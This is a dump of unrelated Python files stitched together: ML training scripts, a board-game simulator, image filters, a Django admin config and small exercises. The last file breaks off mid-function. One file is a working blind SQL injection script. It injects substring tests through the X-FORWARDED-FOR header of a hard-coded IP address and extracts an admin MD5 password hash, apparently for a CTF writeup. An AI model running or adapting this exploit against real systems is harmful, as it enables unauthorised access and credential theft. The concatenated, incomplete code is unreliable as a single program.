    def __init__(self, net, data):
        # net: network object exposing .images/.labels placeholders and .total_loss
        # data: dataset object whose .get() returns (images, labels) batches
        self.net = net
        self.data = data
        self.weights_file = cfg.WEIGHTS_FILE
        self.max_iter = cfg.MAX_ITER
        self.initial_learning_rate = cfg.LEARNING_RATE
        self.decay_steps = cfg.DECAY_STEPS
        self.decay_rate = cfg.DECAY_RATE
        self.staircase = cfg.STAIRCASE
        self.summary_iter = cfg.SUMMARY_ITER
        self.save_iter = cfg.SAVE_ITER
        # Time-stamped output directory for checkpoints and summaries.
        self.output_dir = os.path.join(
            cfg.OUTPUT_DIR, datetime.datetime.now().strftime('%Y_%m_%d_%H_%M'))
        if not os.path.exists(self.output_dir):
            os.makedirs(self.output_dir)
        self.save_cfg()
        # Unlike tf.Variable, tf.get_variable has a reuse check: creating a
        # second variable with the same name that is not marked shared
        # makes TensorFlow raise an error.
        self.variable_to_restore = tf.global_variables()
        self.saver = tf.train.Saver(self.variable_to_restore, max_to_keep=None)
        self.ckpt_file = os.path.join(self.output_dir, 'yolo_text_detect.ckpt')
        # TF uses summaries to visualize the data flow; merge_all manages
        # every registered summary. Computing summaries requires fed data.
        self.summary_op = tf.summary.merge_all()
        self.writer = tf.summary.FileWriter(self.output_dir, flush_secs=60)
        self.global_step = tf.train.create_global_step()
        # Learning-rate decay schedule.
        self.learning_rate = tf.train.exponential_decay(
            self.initial_learning_rate, self.global_step, self.decay_steps,
            self.decay_rate, self.staircase, name='learning_rate')
        # Optimizer: plain gradient descent.
        self.optimizer = tf.train.GradientDescentOptimizer(
            learning_rate=self.learning_rate)
        # Build the train op from model, loss function and optimizer.
        self.train_op = slim.learning.create_train_op(
            self.net.total_loss, self.optimizer, global_step=self.global_step)
        gpu_options = tf.GPUOptions()
        config = tf.ConfigProto(gpu_options=gpu_options)
        self.sess = tf.Session(config=config)
        self.sess.run(tf.global_variables_initializer())
        # if cfg.WEIGHTS_FILE is not None:
        if self.weights_file is not None:
            print(self.weights_file)
            log_str = 'Restoring weights from: ' + self.weights_file
            print(log_str)
            yolo_log(log_str)
            self.saver.restore(self.sess, self.weights_file)
        self.writer.add_graph(self.sess.graph)

    def train(self):
        """Run the training loop for max_iter steps."""
        # Timers for the train and data-loading phases.
        train_timer = Timer()
        load_timer = Timer()
        # Iterate max_iter times in total.
        for step in range(1, self.max_iter + 1):
            load_timer.tic()
            # Fetch input images and labels; each call returns a new batch.
            images, labels = self.data.get()
            load_timer.toc()
            # Convert the batch into a feed_dict for the network.
            feed_dict = {self.net.images: images,
                         self.net.labels: labels}
            # Checkpoint cadence: every summary_iter steps, report the
            # current position, loss and related state.
            if step % self.summary_iter == 0:
                # Every 10 * summary_iter steps, also log the full status.
                if step % (self.summary_iter * 10) == 0:
                    train_timer.tic()
                    # Run one session step: current summary, loss, train op.
                    summary_str, loss, _ = self.sess.run(
                        [self.summary_op, self.net.total_loss, self.train_op],
                        feed_dict=feed_dict)
                    train_timer.toc()
                    # use format to remake the log info.
                    log_str = '''
{} Epoch: {},
Step: {},
Learning rate: {},
Loss: {:5.3f}\n
Speed: {:.3f}s/iter,
Load: {:.3f}s/iter,
Remain: {}
'''.format(
                        datetime.datetime.now().strftime('%m-%d %H:%M:%S'),
                        self.data.epoch,
                        int(step),
                        round(self.learning_rate.eval(session=self.sess), 6),
                        loss,
                        train_timer.average_time,
                        load_timer.average_time,
                        train_timer.remain(step, self.max_iter)
                    )
                    print(log_str)
                    yolo_log(log_str)
                else:  # check only, no archival logging
                    train_timer.tic()
                    # Not at the 10x mark: keep training, computing the
                    # summary and optimizing the loss.
                    summary_str, _ = self.sess.run(
                        [self.summary_op, self.train_op],
                        feed_dict=feed_dict)
                    train_timer.toc()
                # Write the summary for TensorBoard.
                self.writer.add_summary(summary_str, step)
            else:  # neither check nor archive — just train
                train_timer.tic()
                self.sess.run(self.train_op, feed_dict=feed_dict)
                train_timer.toc()
            # Save point (separate from the check cadence): archive the
            # model configuration and parameters every save_iter steps.
            if step % self.save_iter == 0:
                log_str = '{} Saving checkpoint file to: {}'.format(
                    datetime.datetime.now().strftime('%m-%d %H:%M:%S'),
                    self.output_dir)
                print(log_str)
                yolo_log(log_str)
                # Save operation.
                self.saver.save(
                    self.sess, self.ckpt_file, global_step=self.global_step)

    def save_cfg(self):
        """Dump the upper-case config entries to config.txt (run once at start)."""
        with open(os.path.join(self.output_dir, 'config.txt'), 'w') as f:
            cfg_dict = cfg.__dict__
            for key in sorted(cfg_dict.keys()):
                # Config constants are upper-case by convention; skip the rest.
                if key[0].isupper():
                    cfg_str = '{}: {}\n'.format(key, cfg_dict[key])
                    f.write(cfg_str)
def update_config_paths(data_dir, weights_file):
    """Repoint the detector config at *data_dir* and the given weights file."""
    cfg.DATA_PATH = data_dir
    # Derived directories all live directly under the data directory.
    for attr, subdir in (("CACHE_PATH", "cache"),
                         ("OUTPUT_DIR", "output"),
                         ("WEIGHTS_DIR", "weights")):
        setattr(cfg, attr, os.path.join(cfg.DATA_PATH, subdir))
    cfg.WEIGHTS_FILE = os.path.join(cfg.WEIGHTS_DIR, weights_file)
def main():
    """Parse CLI arguments, configure paths and GPU, then run training."""
    # parser: convert input message into class or data structs
    parser = argparse.ArgumentParser()
    parser.add_argument('--weights', default="YOLO_text_detect.ckpt", type=str)
    parser.add_argument('--data_dir', default="data", type=str)
    parser.add_argument('--threshold', default=0.2, type=float)
    parser.add_argument('--iou_threshold', default=0.5, type=float)
    parser.add_argument('--gpu', default='0', type=str)
    args = parser.parse_args()
    if args.gpu is not None:
        cfg.GPU = args.gpu
    # Re-derive all config paths when a non-default data dir is given.
    if args.data_dir != cfg.DATA_PATH:
        update_config_paths(args.data_dir, args.weights)
    # os.environ['CUDA_VISIBLE_DEVICES'] = '0'
    os.environ['CUDA_VISIBLE_DEVICES'] = cfg.GPU
    yolo = YOLONet()
    data_set = text_detect_obj('train')
    solver = Solver(yolo, data_set)
    print('Start training ...')
    yolo_log('Start training ...')
    solver.train()
    print('Done training.')
    yolo_log('Done training.')


if __name__ == '__main__':
    # python train.py --weights YOLO_small.ckpt --gpu 0
    main()
|
# Name: Wes MacDonald
# Date: 11/30/2020
# Description: A program to simulate playing the abstract board game Focus/Domination
class Board:
    """Represents the 6x6 Focus/Domination board."""

    def __init__(self, p1_color, p2_color):
        """Initialize the board with the standard starting layout.

        :param p1_color: player 1 piece color
        :type p1_color: str
        :param p2_color: player 2 piece color
        :type p2_color: str
        """
        # Each space is a list: index 0 holds the (row, col) coord tuple,
        # index 1 the bottom of the stack, and the last index the top.
        self._full_board_list = [[(row, col)]
                                 for row in range(6)
                                 for col in range(6)]
        # The starting layout repeats p1, p1, p2, p2 across the flat list.
        pattern = (p1_color, p1_color, p2_color, p2_color)
        for index, space in enumerate(self._full_board_list):
            space.append(pattern[index % 4])

    def get_full_board_list(self):
        """get method for _full_board_list

        :return: a list of lists of the board, containing coords and pieces @ each coord
        :rtype: list
        """
        return self._full_board_list

    def show_board(self):
        """method to show the board in a visually understandable way, * = empty space"""
        for row_start in range(0, 36, 6):
            for offset in range(6):
                stack = self._full_board_list[row_start + offset]
                # Print the pieces bottom-to-top, then pad to height 5 with '*'.
                for piece in stack[1:]:
                    print(piece, end="")
                print("*" * (5 - (len(stack) - 1)), end=" ")
            print("")
        print("-----------------------------------")
class Player:
    """Represents one Focus/Domination player and their piece counts."""

    def __init__(self, name, color):
        """Initialize a player.

        :param name: name of player
        :type name: str
        :param color: color of player pieces
        :type color: str
        """
        self._player_name = name
        self._player_color = color
        # Both piece tallies start at zero.
        self._captured_pieces = 0
        self._reserve_pieces = 0

    def get_player_name(self):
        """Return the player's name.

        :rtype: str
        """
        return self._player_name

    def get_player_color(self):
        """Return the player's piece color.

        :rtype: str
        """
        return self._player_color

    def get_captured_pieces(self):
        """Return the player's captured-piece count.

        :rtype: int
        """
        return self._captured_pieces

    def set_captured_pieces(self, num_piece):
        """Adjust the captured-piece count: +1 adds a piece, -1 removes one.

        :param num_piece: delta to apply to the captured-piece count
        :type num_piece: int
        """
        self._captured_pieces += num_piece

    def get_reserve_pieces(self):
        """Return the player's reserve-piece count.

        :rtype: int
        """
        return self._reserve_pieces

    def set_reserve_pieces(self, num_piece):
        """Adjust the reserve-piece count: +1 adds a piece, -1 removes one.

        :param num_piece: delta to apply to the reserve-piece count
        :type num_piece: int
        """
        self._reserve_pieces += num_piece
class FocusGame:
    """represents the game"""
    # Board squares (from Board.get_full_board_list) are lists whose first
    # element is the coord tuple and whose remaining elements are the pieces
    # stacked there, bottom (index 1) to top (index -1).

    def __init__(self, p1_tup, p2_tup):
        """initializes a game object
        :param p1_tup: strings of player1_name and player1_color
        :type p1_tup: tuple
        :param p2_tup: strings of player2_name and player2_color
        :type p2_tup: tuple
        """
        self._player1 = Player(p1_tup[0], p1_tup[1])
        self._player2 = Player(p2_tup[0], p2_tup[1])
        self._board = Board(self._player1.get_player_color(), self._player2.get_player_color())
        self._turn = self._player1  # player 1 moves first

    def validate_move(self, player_name, start_loc, end_loc, num_pieces):
        """checks the validity of any moves
        :param player_name: name of player who's trying to move
        :type player_name: str
        :param start_loc: coord to move pieces from
        :type start_loc: tuple
        :param end_loc: coord to move pieces to
        :type end_loc: tuple
        :param num_pieces: number of pieces to move
        :type num_pieces: int
        :return: notification codes for whether the move is valid or not
        :rtype: str
        """
        # Implicitly returns None when every check passes.
        if player_name != self._turn.get_player_name():  # check if it's player's turn
            return "n_y_t"  # Not_Your_Turn code
        # check locations are possible spaces on board
        if not -1 < start_loc[0] < 6 or not -1 < start_loc[1] < 6:
            return "i_s_l"  # Illegal_Start_Location code
        if not -1 < end_loc[0] < 6 or not -1 < end_loc[1] < 6:
            return "i_e_l"  # Illegal_End_Location code
        # check if end_loc is num_pieces away from start_loc, and only vertical or horizontal move
        row_move = abs(start_loc[0] - end_loc[0])
        column_move = abs(start_loc[1] - end_loc[1])
        if not ((row_move == 0 and column_move == num_pieces) or (row_move == num_pieces and column_move == 0)):
            return "i_l"  # Illegal_Location code
        # check stack for: if piece on top belongs to turn player, & player not trying to move more pieces than in stack
        for loc in self._board.get_full_board_list():  # loop through locations on board
            if loc[0] == start_loc:  # find start coord
                if loc[-1] != self._turn.get_player_color():  # check if piece on top belongs to turn player
                    return "i_l"
                elif num_pieces > (len(loc) - 1):  # check not trying to move more pieces than in stack
                    return "i_n_o_p"  # Invalid_Number_Of_Pieces code

    def move_piece(self, player_name, start_loc, end_loc, num_pieces):
        """move method, for single and multiple moves
        :param player_name: name of player who's trying to move
        :type player_name: str
        :param start_loc: coord to move pieces from
        :type start_loc: tuple
        :param end_loc: coord to move pieces to
        :type end_loc: tuple
        :param num_pieces: number of pieces to move
        :type num_pieces: int
        :return: notification messages, or False for whether the move was completed successfully or not
        :rtype: str or bool
        """
        # check if move is valid
        val = self.validate_move(player_name, start_loc, end_loc, num_pieces)
        if val == "n_y_t":
            return False
        elif val == "i_l" or val == "i_s_l" or val == "i_e_l":
            return False
        elif val == "i_n_o_p":
            return False
        # move
        picked_up = []  # hold pieces being moved, collected top-first
        for loc in self._board.get_full_board_list():  # loop through locations on board
            if loc[0] == start_loc:  # find start coord
                for i in range(num_pieces):  # for each piece being moved
                    # picked_up += loc[len(loc) - 1] # add moved piece (from top of stack) to picked_up
                    picked_up.append(loc[len(loc) - 1])  # add moved piece (from top of stack) to picked_up
                    del loc[len(loc) - 1]  # delete moved piece (from top of stack)
        for loc in self._board.get_full_board_list():  # loop through locations on board
            if loc[0] == end_loc:  # find end coord
                # picked_up is top-first, so append back-to-front to keep
                # the moved stack in its original order at the destination.
                for i in range(len(picked_up), 0, -1):  # for each piece in pieces, backwards from the end
                    loc.append(picked_up[i - 1])  # add piece (one by one) to coord
        # check if stack is > 5
        player_obj = self.get_player_object(player_name)
        self.check_height(player_obj, end_loc)
        # check win condition
        if player_obj.get_captured_pieces() >= 6:
            return f"{player_obj.get_player_name()} Wins"
        # alternate turn
        self.set_turn(player_name)
        return "successfully moved"

    def reserved_move(self, player_name, location):
        """move method for moving a piece from player's own reserve
        :param player_name: name of player who's trying to move
        :type player_name: str
        :param location: coord to move piece to
        :type location: tuple
        :return: notification messages, or False for whether the move was completed successfully or not
        :rtype: str or bool
        """
        # check if move is valid
        # NOTE: (0, 0) is a dummy start coord; only the turn and
        # end-location codes are acted on below, other codes are ignored.
        val = self.validate_move(player_name, (0, 0), location, 1)
        if val == "n_y_t":
            return False
        elif val == "i_e_l":
            return False
        # move
        player_obj = self.get_player_object(player_name)  # check there's pieces in player's reserve
        if player_obj.get_reserve_pieces() <= 0:
            return False
        else:  # add piece to board location
            for loc in self._board.get_full_board_list():  # loop through locations on board
                if loc[0] == location:
                    loc.append(player_obj.get_player_color())  # add player's piece to location on board
                    player_obj.set_reserve_pieces(-1)  # remove piece from player's reserve
        # check if stack is > 5
        self.check_height(player_obj, location)
        # check win condition
        if player_obj.get_captured_pieces() >= 6:
            return f"{player_obj.get_player_name()} Wins"
        # alternate turn
        self.set_turn(player_name)
        return "successfully moved"

    def check_height(self, player_obj, location):
        """method to check if stack of pieces is > 5 pieces tall: if so: capture bottom pieces that belong to
        the other player and/or reserve bottom pieces that belong to player in control of the stack
        :param player_obj: name of player who's in control of stack
        :type player_obj: Player
        :param location: coord to check height of
        :type location: tuple
        """
        for loc in self._board.get_full_board_list():
            if loc[0] == location:  # find coord
                while len(loc) > 6:  # stack taller than 5 (index 0 is the coord)
                    bottom_piece = loc[1]
                    if bottom_piece == player_obj.get_player_color():
                        player_obj.set_reserve_pieces(1)
                    else:
                        player_obj.set_captured_pieces(1)
                    del loc[1]

    def show_pieces(self, loc):
        """shows pieces at a location on the board
        :param loc: coord to show
        :type loc: tuple
        :return: a list with pieces at that location, index 0 = base level, or "invalid location"
        :rtype: list or str
        """
        # validation check that coord exists (reuses validate_move with a
        # dummy end coord; only the start-location code matters here)
        val = self.validate_move(self._turn.get_player_name(), loc, (0, 0), 1)
        if val == "i_s_l":
            return "invalid location"
        # return list of pieces
        for space in self._board.get_full_board_list():
            if space[0] == loc:  # find loc
                return space[1:]

    def show_reserve(self, player_name):
        """show a count of pieces in that player's reserve
        :param player_name: name of player
        :type player_name: str
        :return: player's _reserve_pieces
        :rtype: int
        """
        return self.get_player_object(player_name).get_reserve_pieces()

    def show_captured(self, player_name):
        """show count of pieces in that player's captured
        :param player_name: name of player
        :type player_name: str
        :return: player's _captured_pieces
        :rtype: int
        """
        return self.get_player_object(player_name).get_captured_pieces()

    def get_player_object(self, player_name):
        """takes a player's name and returns the associated player object
        :param player_name: name of player
        :type player_name: str
        :return: player object
        :rtype: Player or bool
        """
        if player_name == self._player1.get_player_name():
            return self._player1
        elif player_name == self._player2.get_player_name():
            return self._player2
        else:
            return False  # could also return "not your turn"...?

    def get_turn(self):
        """get method for player_turn
        :return: player object whose turn it is
        :rtype: Player
        """
        return self._turn

    def set_turn(self, current_player_name):
        """set method for player_turn
        :param current_player_name: name of player
        :type current_player_name: str
        """
        # Hands the turn to whichever player is NOT current_player_name.
        if current_player_name == self._player1.get_player_name():
            self._turn = self._player2
        else:
            self._turn = self._player1

    def show_board(self):
        """shows board for current game"""
        self._board.show_board()
def main():
    """for testing"""
    # READ ME — example session kept for reference:
    # game = FocusGame(('PlayerA', 'R'), ('PlayerB', 'G'))
    # print(game.move_piece('PlayerA', (0, 0), (0, 1), 1)) # Returns message "successfully moved"
    # print(game.show_pieces((0, 1))) # Returns ['R','R']
    # print(game.show_captured('PlayerA')) # Returns 0
    # print(game.reserved_move('PlayerA', (0, 0))) # Returns False, not per update (message "No pieces in reserve")
    # print(game.show_reserve('PlayerA')) # Returns 0


if __name__ == '__main__':
    main()
|
class MyRange(object):
    """An object that is both an iterable and its own iterator, so it
    supports only a single pass of iteration.

    (Docstring translated from Chinese: "acts as iterable and iterator at
    the same time; can only be iterated once".)
    """

    def __init__(self, start, end):
        self.start = start
        self.end = end
        self.index = start  # cursor; never reset, hence single-pass

    def __iter__(self):
        # An iterator's __iter__ returns itself.
        return self

    def __next__(self):
        if self.index >= self.end:
            raise StopIteration
        current = self.index
        self.index += 1
        return current
# Demo: iterate a MyRange once with a for loop, then show that a second,
# manual iteration yields nothing because the cursor is already exhausted.
ret = MyRange(1, 10)
for i in ret:
    print(i)
print("*" * 20)
# The for loop above advanced `index` to the end, so nothing is printed
# below.  (Comment translated from Chinese.)
ret_iter = ret.__iter__()
while True:
    try:
        x = ret_iter.__next__()
        print(x)
    except StopIteration:
        break
|
import numpy as np
import cv2
import os
from time import sleep
from random import shuffle
from tqdm import tqdm
# Build a car-vs-forest training set from JPEGs on disk, then train a
# GoogLeNet-style model on it.  Each sample is a (90, 90, 2) array: the
# grayscale image stacked with its Canny edge map.
# NOTE(review): indentation was reconstructed; confirm loop bodies and the
# placement of shuffle(forest)/model.save against the original file.
car_list = os.listdir('temp_data/car')
forest_list = os.listdir('temp_data/forest')
#print(file_list)
car = []
forest = []
# One-hot class labels: [1,0] = car, [0,1] = forest.
car_one_hot = [1,0]
forest_one_hot = [0,1]
for file in tqdm(car_list):
    if file.endswith(".jpeg"):
        file_name = "temp_data/car/" + file
        image = cv2.imread(file_name,cv2.IMREAD_GRAYSCALE)
        image = np.array(cv2.resize(image,(90,90)))
        new_image = image.reshape(-1,90,90,1)
        # Edge channel: Canny with thresholds 100/200.
        canny = cv2.Canny(image,100,200)
        new_canny = canny.reshape(-1,90,90,1)
        concat = np.concatenate((new_image,new_canny),axis=3)
        car.append([concat,car_one_hot])
        # if cv2.waitKey(1) & 0xFF == ord('q'):
        #     break
for file in tqdm(forest_list):
    if file.endswith(".jpeg"):
        file_name = "temp_data/forest/" + file
        image = cv2.imread(file_name,cv2.IMREAD_GRAYSCALE)
        image = np.array(cv2.resize(image,(90,90)))
        new_image = image.reshape(-1,90,90,1)
        canny = cv2.Canny(image,100,200)
        new_canny = canny.reshape(-1,90,90,1)
        concat = np.concatenate((new_image,new_canny),axis=3)
        forest.append([concat,forest_one_hot])
shuffle(forest)
# if cv2.waitKey(1) & 0xFF == ord('q'):
#     break
final_data = car + forest
shuffle(final_data)
# np.save('car_vs_forest.npy', final_data)
'''
Make the useable data from the image
'''
# start training
from googlenet import googlenet
WIDTH = 90
HEIGHT = 90
LR = 1e-3
epoch = 10
model = googlenet(WIDTH,HEIGHT,LR)
for i in range(epoch):
    # train_data = np.load('car_vs_forest.npy')
    train_data = final_data
    train = train_data
    # NOTE(review): the comprehension variable `i` shadows the epoch loop
    # variable `i`; harmless here but confusing.
    X = np.array([i[0] for i in tqdm(train)]).reshape(-1,90,90,2)
    Y = [i[1] for i in train]
    # test_X = np.array([i[0] for i in tqdm(test)]).reshape(-1,90,90,2)
    # test_Y = [i[1] for i in test]
    model.fit(X,Y, n_epoch=1, validation_set=0.1,shuffle=True,snapshot_step=500, show_metric=True, run_id="googlenet")
model.save("googlenet.model")
# data = []
# # label = []
# for i in final_data:
# # reshape_data = i[0].reshape(-1,90,90,1)
# # data.append([reshape_data])
# # label.append([i[1]])
# print(i[1])
# np.save('car_vs_forest_data.npy', data)
# np.save('car_vs_forest_label.npy', label)
from django.contrib import admin
from .models import Autor
from .models import Ksiazka
from .models import WypozyczonaKsiazka
import adminactions.actions as actions
from django.contrib.admin import site
# Register library models with the Django admin site.
admin.site.register(Autor)
#admin.site.register(Ksiazka)


class KsiazkaAdmin(admin.ModelAdmin):
    # Columns shown in the book (Ksiazka) changelist view.
    list_display = ('tytul', 'wydawnictwo', 'data_wydania', 'klucz_autora')


admin.site.register(Ksiazka, KsiazkaAdmin)


class WypozyczonaKsiazkaAdmin(admin.ModelAdmin):
    # Sidebar filters for borrowed books (status, due date, borrower).
    list_filter = ('status', 'data_zwrotu', 'wypozyczajacy')


admin.site.register(WypozyczonaKsiazka, WypozyczonaKsiazkaAdmin)

# Enable django-adminactions bulk actions (export, mass update, ...).
actions.add_to_site(site)
|
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 2 16:33:52 2019
@author: saib
"""
class Student:
    """A student with a private full name, an age, and a roll number
    drawn from a class-level counter shared by all instances."""

    total = 1  # next roll number to hand out

    def __init__(self, n, a):
        self.__full_name = n
        self.age = a
        # Take the current counter as this student's roll number, then
        # advance it for the next instance.
        self.rollno = self.__class__.total
        self.__class__.total += 1

    def inc_age(self, c):
        """Increase the student's age by c years."""
        self.age = self.age + c

    def __repr__(self):
        return "Student"

    def __gt__(self, other):
        # Students compare by age.
        return self.age > other.age

    def get_name(self):
        """Return the (name-mangled) full name."""
        return self.__full_name
class child_class(Student):
    """Student subclass that additionally records a class section."""

    def __init__(self, n, a, s):
        # Delegate name/age/roll-number setup to the parent class.
        Student.__init__(self, n, a)
        self.section = s
|
#### Script for plotting machine produced data ####
#### IGA (machine 2) ####
import glob, os
from collections import OrderedDict
import simplejson as json
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
from matplotlib.pyplot import show, plot, ion
import pylab
import numpy as np
if __name__ == '__main__':
    # NOTE(review): Python 2 script (print statement at the end).
    # Move up out of the script's own directory so the relative
    # IGA_Files/... paths resolve.
    os.chdir(os.path.dirname(os.getcwd()))
    for file in glob.glob("IGA_Files/Data_Files/JSON/*.json"):
        json_file_path = file
        # The sequence id is the first "_"-separated token of the filename.
        sequence = file.split("/")[-1].split("_")[0]
        with open('%s'%json_file_path) as json_data_file:
            json_dict = json.load(json_data_file)
        begin = 1
        pressure_list = []
        conc_list = []
        # Walk the "content" entries until indexing runs off the end.
        # NOTE(review): the bare except also swallows missing-key errors
        # (AttributeError on .get of None) — consider narrowing it.
        while True:
            try:
                content_dict = json_dict["content"][begin - 1]
                pressure_dict = content_dict.get('pressure')
                conc_dict = content_dict.get('concentration')
                pressure_val = pressure_dict.get('value')
                conc_val = conc_dict.get('value')
                pressure_list.append(pressure_val)
                conc_list.append(conc_val)
                begin +=1
            except:
                break
        # One scatter plot per JSON file, saved under IGA_plots/.
        plot_path = '%s/IGA_Files/IGA_plots/%s_IGAplot.png'%(os.getcwd(), sequence)
        plt.plot(pressure_list, conc_list, 'ro')
        plt.axis([0, 20, 0, 3.5])
        plt.savefig('%s'%plot_path)
    print "done"
|
from BeautifulSoup import BeautifulSoup

# Read raw HTML, pretty-print it with BeautifulSoup (v3 API), write the
# result to parse.html and echo it to stdout.
# Fix: the original opened base.html without ever closing it; both files
# are now managed with context managers.
with open('base.html', 'r') as source:
    soup = BeautifulSoup(source.read())

with open('parse.html', 'w') as parse:
    parse.write(u'{0}'.format(soup.prettify()))
print(soup.prettify())
from . import v1_core
def list_nodes():
    """Return the node list from the core v1 API.

    Thin wrapper around ``v1_core.list_node()`` that pluralizes the name
    for this package's public interface.
    """
    return v1_core.list_node()
|
from processamento.Imagem import Imagem
from processamento import Filtros as ft
"""
Vamos ler algumas imagens, aplicar efeitos e salvá-las em arquivo
"""
def ler_imagem(caminho: str):
    """Lê uma imagem Netpbm ASCII (P1/P2/P3) do disco.

    :param caminho: path to the image file.
    :return: tuple ``(tipo_img, dim_matriz, valor_max, pixels)`` —
        the magic-number line, the dimension line, the maximum pixel
        value, and a flat list of pixel values.
    """
    # Fix: use a context manager so the file handle is always closed
    # (the original opened the file and never closed it).
    with open(caminho, encoding='utf-8') as img:
        linhas = []
        for linha in img:
            # Skip comment lines and blank lines.
            if not linha.startswith('#') and linha != '\n':
                linhas.append(linha)
    # TODO: fazer com que na leitura, seja criado objeto tupla, que especifica o número de canais de um pixel.
    # em seguida, o objeto pixel deve tomar a tupla como base para formar a matriz que sera iterada nos efeitos.
    # tipo_img = TuplaCores(linhas[0])
    tipo_img = linhas[0]
    dim_matriz = linhas[1]
    pixels = []
    if 'P1' in tipo_img:
        # P1 bitmap: pixels are single '0'/'1' characters, no max-value line.
        valor_max = '1'
        for linha in linhas[2:]:
            linha = linha.replace(' ', '').replace('\n', '')
            pixels.extend(linha)
    else:
        # P2/P3: the third line holds the maximum value; one value per line after.
        valor_max = int(linhas[2])
        pixels = [int(valor) for valor in linhas[3:]]
    return tipo_img, dim_matriz, valor_max, pixels
def realizar_operacoes_na_imagem(imagem: Imagem, efeito: ft.Filtro):
    """Aplica um filtro sobre uma cópia da imagem e gera seu histograma.

    Returns a new Imagem; the input image is left untouched.
    """
    copia = Imagem(imagem.tipo, imagem.dimensao, imagem.maximo, imagem.pixels)
    copia.pixels = efeito.aplicar_efeito(imagem.pixels)
    # Histogram is normalized and persisted to disk as a side effect.
    copia.gerar_histograma(normalizar=True, salvar=True)
    return copia
def aplicar_todos_efeitos(img_original: Imagem):
    """Aplica negativo, limiarização e fatiamento à imagem original e
    salva cada resultado em img/."""
    efeito_negativo = ft.Negativo()
    efeito_limiarizacao = ft.Limiarizacao(valor_maximo=img_original.maximo, limiar=100)
    efeito_fatiamento = ft.Fatiamento(100, 150)
    # Each effect is applied to an independent copy of the original.
    resultados = [
        realizar_operacoes_na_imagem(imagem=img_original, efeito=efeito)
        for efeito in (efeito_negativo, efeito_limiarizacao, efeito_fatiamento)
    ]
    resultados[0].salvar('img/saida_negativo.ppm')
    resultados[1].salvar('img/saida_limiarizacao.ppm')
    resultados[2].salvar('img/saida_fatiamento.ppm')
def main():
    """Lê a imagem de entrada, aplica suavização e as operações
    morfológicas básicas, salvando cada resultado em out/."""
    path_entrada = 'img/ankh_negativo.pbm'
    tipo, dim, maxi, pixels = ler_imagem(path_entrada)
    img_original = Imagem(tipo=str(tipo), dimensao=dim, maximo=maxi, pixels=pixels)
    morfologia = ft.Morfologia()
    suavizacao = ft.Suavizacao()

    def _salvar(imagem, nome_saida):
        # Persist one processed image and report where it went.
        imagem.salvar(nome_saida)
        print('Imagem salva como: ', nome_saida)

    _salvar(suavizacao.filtro_da_mediana(img_original), 'out/ankh_negativo_suavizado.pbm')
    _salvar(morfologia.erosao(img_original), 'out/ankh_negativo_erodido.pbm')
    _salvar(morfologia.dilatacao(img_original), 'out/ankh_negativo_dilatado.pbm')
    _salvar(morfologia.abertura(img_original), 'out/ankh_negativo_aberto.pbm')
    _salvar(morfologia.fechamento(img_original), 'out/ankh_negativo_fechado.pbm')


if __name__ == '__main__':
    main()
|
# Read the available tomato and cheese slice counts from one input line.
tomato_slices, cheese_slices=map(int,input().split())

# A big pizza uses 4 tomato + 1 cheese slice; a small one uses 2 + 1.
Big_count=0
small_count=0
val = max(tomato_slices, cheese_slices)

# How many big pizzas could be made on their own (candidates 1..val-1,
# stopping at the first count that no longer fits).
i = 1
while i < val and 4*i <= tomato_slices and 1*i <= cheese_slices:
    Big_count += 1
    i += 1

# Same count for small pizzas.
j = 1
while j < val and 2*j <= tomato_slices and 1*j <= cheese_slices:
    small_count += 1
    j += 1

print('Big Pizza:',Big_count)
print('Small Pizza:',small_count)
|
# -*- coding: utf-8 -*-
import nysol._nysolshell_core as n_core
from nysol.mcmd.nysollib.core import NysolMOD_CORE
from nysol.mcmd.nysollib import nysolutil as nutil
class Nysol_Mcombi(NysolMOD_CORE):
    """Python wrapper module for the nysol ``mcombi`` command."""
    # Parameter keyword lists (all / input / output) queried from the
    # native core for the "mcombi" command.
    _kwd ,_inkwd,_outkwd = n_core.getparalist("mcombi",3)
    def __init__(self,*args, **kw_args) :
        super(Nysol_Mcombi,self).__init__("mcombi",nutil.args2dict(args,kw_args,Nysol_Mcombi._kwd))


def mcombi(self,*args, **kw_args):
    # Method form: build an mcombi stage and chain it after `self`.
    return Nysol_Mcombi(nutil.args2dict(args,kw_args,Nysol_Mcombi._kwd)).addPre(self)


# Expose mcombi as a chainable method on every NysolMOD_CORE instance.
setattr(NysolMOD_CORE, "mcombi", mcombi)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
# NOTE(review): Python 2 script (print statements).  It recovers an MD5
# password hash one hex character at a time through a blind SQL injection
# in the X-FORWARDED-FOR header of a deliberately vulnerable CTF challenge
# host.  Kept for the writeup only — do not point it at real systems.
# Candidate alphabet: hex digits of an MD5 hash.
chars = '0123456789abcdef'
checking_str = 'Non mauvais password'
pwd_size = 32
# Recovered MD5 hash accumulates here.
result = ''
url = 'http://95.142.162.76:8082/index.php?p=admin'
data = {'username' : 'admin', 'password' : 'admin'}
print 'Merci de patienter pendant que le script récupère le hash du password...'
for index in range(pwd_size + 1):
    for char in chars:
        # Inject a substring test on the stored password hash.
        headers = { 'X-FORWARDED-FOR' : '127.0.0.1\' OR substr(password, %s, 1) = %s #' % (str(index), str(hex(ord(char)))) }
        req = requests.post(url, data=data, headers=headers)
        # If the failure marker is absent, the guessed character was right.
        if req.text.find(checking_str) == -1:
            print 'Caractère en position %d trouvé.' % index
            result = result + char
            break
# Print the recovered hash.
print 'Hash md5 : %s' % result
|
"""Builds vocabularies of tokens, lemmas, POS tags and labels"""
# Adapted from https://github.com/cs230-stanford/cs230-code-examples/blob/master/pytorch/nlp/build_vocab.py
# accessed on 03/09/2020
import argparse
import os
import json
from collections import Counter
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', default='data/balanced',
help="Directory containing the dataset")
PAD_WORD = '<pad>'
UNK_WORD = 'UNK'
def save_vocab_to_txt_file(vocab, txt_path):
    """Writes one token per line, 0-based line id corresponds to the id of the token.

    Args:
        vocab: (iterable object) yields tokens
        txt_path: (string) path to vocab file
    """
    # Fix: docstring typo ("stirng"); batch the writes instead of one
    # write() call per token.
    with open(txt_path, 'w', encoding='utf-8') as f:
        f.writelines(token + '\n' for token in vocab)
def save_dict_to_json(d, json_path):
    """Saves dict to json file

    Args:
        d: (dict) any mapping; Counter/defaultdict subclasses are
            normalized to a plain dict before serializing
        json_path: (string) path to json file
    """
    with open(json_path, 'w', encoding='utf-8') as f:
        # Fix: the original rebuilt the mapping with an identity dict
        # comprehension; dict(d) does the same normalization directly.
